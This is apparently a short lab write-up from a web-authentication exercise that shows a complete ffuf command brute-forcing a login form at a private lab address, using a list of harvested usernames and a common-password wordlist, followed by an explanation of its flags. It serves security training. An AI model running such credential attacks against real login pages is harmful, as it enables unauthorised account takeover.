Brute Force

Using the valid_usernames.txt file I generated in the previous task, I can now use this to attempt a brute force attack on the login page (http://10.10.13.84/customers/login). A brute force attack is an automated process that tries a list of commonly used passwords against either a single username or, like in this case, a list of usernames.

ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.13.84/customers/login -fc 200

This ffuf command is a little different to the previous one. Previously I used the FUZZ keyword to select where in the request the data from the wordlists would be inserted, but because Im using multiple wordlists, I have to specify my own FUZZ keyword. In this instance, we've chosen W1 for our list of valid usernames and W2 for the list of passwords I will try. The multiple wordlists are again specified with the -w argument but separated with a comma. For a positive match, I'm using the -fc argument to check for an HTTP status code other than 200.

Last updated